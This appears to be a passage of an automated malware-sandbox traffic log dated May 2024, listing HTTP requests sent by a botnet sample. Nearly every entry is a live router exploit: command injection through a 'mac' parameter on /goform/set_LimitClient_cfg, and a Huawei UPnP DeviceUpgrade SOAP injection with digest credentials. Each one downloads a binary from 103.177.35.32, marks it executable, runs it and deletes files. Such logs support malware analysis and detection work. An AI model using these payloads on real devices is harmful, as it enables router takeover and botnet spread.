                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2532192.168.2.233587217.72.168.438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486943007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2533192.168.2.234329887.198.38.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486987114 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2534192.168.2.2350918191.171.219.658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486998081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2535192.168.2.2335186200.58.12.1478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487025023 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2536192.168.2.233395436.23.37.1418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487042904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2537192.168.2.235704686.29.23.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487073898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2538192.168.2.2348292120.65.250.1348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487095118 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2539192.168.2.2333234164.200.142.2548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487112999 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2540192.168.2.235255464.78.213.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487173080 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2541192.168.2.2351872217.1.94.2318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487200022 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2542192.168.2.2337382196.175.103.788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487216949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2543192.168.2.233777694.180.137.2108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487272024 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2544192.168.2.23447501.6.202.1898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487282038 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2545192.168.2.233844498.50.96.2458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487302065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2546192.168.2.235288038.110.163.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487317085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2547192.168.2.233500012.99.156.1688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487353086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2548192.168.2.234082017.84.63.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487364054 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2549192.168.2.2340966199.161.32.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.487394094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2550192.168.2.233615020.62.143.5837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.590987921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2551192.168.2.2346564138.238.128.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.590997934 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
